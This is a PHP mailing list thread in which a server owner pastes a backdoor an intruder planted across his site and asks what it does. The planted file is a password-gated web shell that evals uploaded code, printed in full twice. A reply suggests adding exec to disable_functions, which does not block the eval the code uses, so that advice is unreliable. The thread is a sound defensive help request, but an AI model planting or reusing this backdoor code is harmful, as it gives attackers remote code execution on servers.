Re: Hack question

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

Al wrote:
I'm still fighting my hack problem on one of my servers. Can anyone help me figure out what's the purpose of this code. The hack places this file in numerous dirs on the site, I assume using a php script because the owner is "nobody".
I can sort of figure what is doing; but, I can't figure out what the hacker is using it for.
Incidentally, I've changed all passwords and restricted ftp to two people. I see no sign that any code is written with by site owner, i.e, ftp. And, I've looked carefully for suspect php files.
<?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; echo "<pre>"; testdata('start'); if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){ eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); }; testdata('end'); echo "</pre>"; ?> 


<?php error_reporting(1);
global $HTTP_SERVER_VARS;
function say($t)
{
    echo "$t\n";
} ;
function testdata($t)
{
    say(md5("testdata_$t"));
} ;
echo "<pre>";
testdata('start');
if (md5($_POST["p"]) == "aace99428c50dbe965acc93f3f275cd3")
{
if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"), $HTTP_POST_FILES["f"]["size"])) 
    {
        eval($code);
    }     else
    {
        testdata('f');
    } ;
} else
{
    testdata('pass');
} ;
testdata('end');
echo "</pre>";
?>
My first suggestion is disable the use of exec in the disable_functions entry in your php.ini file. I would not allow the call to exec to be completed. 

so, something like this should work for now.

disable_functions = exec
also, you could modify the file that is being ran to actually capture the uploaded file contents. change out the exec part and have it log it to a file somewhere. Then you can see what they are actually trying to do. 

--
Jim Lucas

   "Some men are born to greatness, some achieve greatness,
       and some have greatness thrust upon them."

Twelfth Night, Act II, Scene V
    by William Shakespeare


--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
[Index of Archives]     [PHP Home]     [Apache Users]     [PHP on Windows]     [Kernel Newbies]     [PHP Install]     [PHP Classes]     [Pear]     [Postgresql]     [Postgresql PHP]     [PHP on Windows]     [PHP Database Programming]     [PHP SOAP]

  Powered by Linux